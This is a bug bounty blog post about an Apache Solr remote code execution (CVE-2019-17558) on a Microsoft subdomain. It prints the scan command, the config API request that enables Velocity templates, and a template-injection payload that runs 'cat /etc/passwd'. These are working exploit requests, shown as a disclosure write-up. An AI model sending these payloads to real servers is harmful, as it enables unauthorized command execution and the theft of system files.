Microsoft Apache Solr RCE Velocity Template | Bug Bounty POC

Hey guys so this blog post is about RCE issue reported to Microsoft bug bounty program, Remote Code execution issue existed in microsoft.com subdomain running Apache Solr.

I’ll try to be as simple as possible. Participated in Microsoft Bug Bounty Program first time..

About the RCE:

While doing some recon on microsoft.com website i found a subdomain http://tide90.microsoft.com/ doing a basic port scan using nmap (nmap -A tide90.microsoft.com ) Showed that port 8983 was open and running Apache Solr, Normally companies run Apache Solr Admin dashboard behind there VPN or is protected by a Login, but on Microsoft it wasn’t protected at all thus just going to
http://tide90.microsoft.com:8983/ Took me to Admin Dashboard.

Apache Solr versions 5.0.0 to 8.3.1 are affected by this vulnuberilty CVE-2019-17558  , To get an RCE on vulnuberal Apache Solr instance you need to trigger it in two steps.
First, the attacker needs to modify the “params.Resource.Loader.Enabled” configuration item to True through the config API.

Sending the Following POST request modified the value

POST /solr/ZigmaCore/config HTTP/1.1
Host: tide90.microsoft.com:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4086.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 261

{
“update-queryresponsewriter”: {
“startup”: “lazy”,
“name”: “velocity”,
“class”: “solr.VelocityResponseWriter”,
“template.base.dir”: “”,
“solr.resource.loader.enabled”: “true”,
“params.resource.loader.enabled”: “true”
}
}

Then complete the vulnerability trigger by sending a malicious velocity template via GET request with custom velocity template parameter in a specially crafted Solr request, leading to RCE

GET /solr/dovecot/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)
+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))
+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27cat%20/etc/passwd%27))
+$ex.waitFor()+%23set($out=$ex.getInputStream())
+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: tide90.microsoft.com:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4086.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 0

That’s all to get an RCE on microsoft.com subdomain, you can read more on it via following the CVE ID,

Reviews about Microsoft Bug Bounty Program: I won’t really suggest participating in Microsoft Bug Bounty if you’re going for web assets Bounty as it’s kinda confusing when it comes to scope and no bounties for most of it..

Anyway it was fun one, thanks for reading.